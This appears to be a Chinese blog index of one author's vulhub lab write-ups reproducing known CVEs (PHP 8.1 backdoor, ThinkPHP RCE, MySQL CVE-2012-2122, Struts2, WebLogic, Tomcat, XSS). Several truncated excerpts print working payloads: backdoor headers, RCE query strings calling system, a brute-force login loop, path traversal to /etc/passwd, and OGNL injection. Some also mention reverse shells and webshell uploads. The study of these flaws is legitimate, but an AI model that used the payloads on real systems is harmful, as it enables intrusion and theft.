
漏洞复现
自己对漏洞复现的记录
. iDea.
这个作者很懒,什么都没留下…
展开
-
vulhub 8.1-backdoor漏洞复现
前言PHP版本8.1.0-dev于2021年3月28日植入了后门,但很快发现并删除了该后门。当服务器上存在此后门时,攻击者可以通过发送User-Agentt标头执行任意代码。复现用vulhub搭好环境后在请求头中构造如下payloadUser-Agentt: zerodiumvar_dump(233*233);执行系统命令:...原创 2021-05-26 21:39:54 · 749 阅读 · 0 评论 -
心脏滴血漏洞
漏洞成因 Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。漏洞分析最初人们为了网络通信安全,就开始使用安全协议进行加密通信,SSL(Secure Socket Layer)就是一种安全协议。随着开源软件的流行,有人写了一款叫 OpenSSL 的开源程序供大家方便地对通信进行SSL原创 2021-11-08 18:42:37 · 506 阅读 · 0 评论 -
xss靶场练习
- Pass-1127.0.0.1/xss/level1.php?name=<script>alert(1)</script>通过- Pass-2直接插入不行,引号将其包裹起了http://127.0.0.1/xss/level2.php?keyword="><script>alert(1)</script><--- Pass-3审查元素看看看似和2没啥区别 但与level2不同的是,value做了校验,双引号和尖括号都原创 2021-11-02 21:59:45 · 294 阅读 · 0 评论 -
json劫持学习
JSON劫持json劫持攻击又为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的目的是获取敏感数据。一些web应用会把一些敏感数据以json的形式返回到前端,如果仅仅通过cookie来判断请求是否合法,那么就可以利用类似csrf的手段,向目标服务器发送请求,以获得敏感数据。靶场练习POC<!DOCTYPE html><html lang="en"><head> <m原创 2021-10-12 22:15:51 · 736 阅读 · 0 评论 -
CVE-2012-1823漏洞复现
前言这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。CGI即通用网关接口(Common Gateway Interface),它是一段程序, 通俗的讲CGI就象是一座桥,把网页和WEB服务器中的执行程序连接起来,它把HTML接收的指令传递给服务器的执行程序,再把服务器执行程序的结果返还给HTML页。复现在相应的漏洞环原创 2021-05-27 19:28:12 · 642 阅读 · 0 评论 -
vuhub thinkphp-5-rce漏洞复现
搭建your-ip:8080搭建成功漏洞复现ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。poc:它将执行phpinfo/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1原创 2021-04-24 16:00:53 · 651 阅读 · 0 评论 -
msyql CVE-2012-2122漏洞复现
搭建进入vulhub对应mysql漏洞环境,执行如下命令即可docker-compose up -d如上则启动成功环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。漏洞复现在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录:for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306原创 2021-04-29 17:57:48 · 520 阅读 · 1 评论 -
thinkphp/5.0.23-rce漏洞复现
环境搭建访问your-ip:8080环境搭建成功漏洞复现thinkphp 5.0.23(完整版)debug模式32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxxthinkphp 5.0.23(完整版)33、(post)public/index.php?s=captcha (data) _method=__co原创 2021-04-22 06:40:52 · 1057 阅读 · 0 评论 -
elasticsearch CVE-2014-3120漏洞复现
搭建docker-compose up -d访问 your-ip:9200搭建成功复现Burpsuit抓包抓到包是这样得首先该漏洞需要es中至少存在一条数据,所有我们需要先创建一条数据POST /website/blog/ HTTP/1.1Host: your-ip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x原创 2021-04-22 04:19:43 · 551 阅读 · 0 评论 -
Ruby on Rails CVE-2019-5418漏洞复现
搭建访问http://your-ip:3000搭建成功漏洞复现Ruby on Rails是一个web应用程序框架,是相对较新的web应用程序框架构建在Ruby语言上在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。({{闭合模板路径)Rails全版本其中修复版本6.0.0.beta3,5.2.2原创 2021-04-12 02:44:45 · 298 阅读 · 0 评论 -
phpmyadin CVE-2016-5734漏洞复现
搭建漏洞复现下载利用脚本:https://www.exploit-db.com/exploits/40185脚本利用方法:-u 账号-p 密码-c 执行代码(php代码) 默认执行uname -apython 40185.py -u root -p root http://192.168.154.3:8080成功读取到文件接下来写入木马 python .\CVE-2016-57.py -u root --pwd="root" http://192.168.1.101:8080原创 2021-04-09 07:27:25 · 238 阅读 · 0 评论 -
weblogic CVE-2017-10271漏洞复现
搭建cd vulhub-master/weblogic/CVE-2017-10271/docker-compose up -d访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动复现1.初步判断:访问 http://192.168.12.147:7001/wls-wsat/CoordinatorPortType11,存在下图则说明可能存在漏洞2.nc监听端口,构造POST包进行测试,反弹shell使用nc 监听 21端口nc -lvp 22原创 2021-04-09 00:22:49 · 322 阅读 · 0 评论 -
tomcat CVE-2020-1938
搭建下载好运行即可访问成功漏洞复现Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取有漏洞的Tomcat服务器上Web目录文件。漏洞验证POChttps://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi漏洞验证,尝试读取文件:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi成功访问到配置文原创 2021-04-08 01:08:10 · 163 阅读 · 0 评论 -
struts2-048漏洞复现
搭建访问成功复现. 在浏览器输入以下链接访问漏洞页面http://your-ip:8080/integration/saveGangster.action在表单中填入如上,主要第一个表单其他可以随便乱写,点解submit在Gangster Name”处把${1+1}修改为以下命令执行的payload语句%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#con原创 2021-04-08 01:56:22 · 189 阅读 · 0 评论 -
Struts2-061漏洞复现
搭建https://github.com/vulhub/vulhub/tree/master/struts2/s2-061拉取镜像启动环境:docker-compose up -d成功访问http://your-ip:8080复现Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表原创 2021-04-08 01:31:52 · 300 阅读 · 0 评论 -
CVE-2019-11043 PHP远程代码执行
CVE-2019-11043 PHP远程代码执行该漏洞是某比赛解决一道CTF题目时发现,向目标服务器URL发送%0a符号时,服务返回异常发现的漏洞2019年9月26日,PHP官方发布漏洞通告,其中指出,使用Nginx+php-fpm的服务器,在部分配置下,存在远程代码执行漏洞,且该配置已被广泛使用,危害较大,影响较为广泛。漏洞环境: git clone https://github.com/vulhub/vulhub.git cd vulhub/php/CVE-2019-11043原创 2021-02-05 16:03:40 · 265 阅读 · 0 评论 -
CVE-2017-12615(Tomcat任意文件上传漏洞)复现
环境搭建利用vulhub搭建环境1、进入vulhub对应的漏洞目录下cd /vulhub/tomcat/CVE-2017-126152.一键搭建环境docker-compose up -d访问成功复现过程抓包PUT写入木马EXP:<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String原创 2021-04-07 00:14:29 · 397 阅读 · 1 评论 -
Vulhub tomcat8漏洞复现
搭建拉取项目git clone https://github.com/vulhub/vulhub.git进入镜像:cd vulhub/tomcat/tomcat8/启动环境:docker-compose up -d登录Tomcat管理后台弱口tomcat:tomcat进入后台上传包含木马的war包getshell部署war包成功访问上冰歇成功拿下.菜鸡复现有不足望大佬指点...原创 2021-04-05 22:53:34 · 1298 阅读 · 0 评论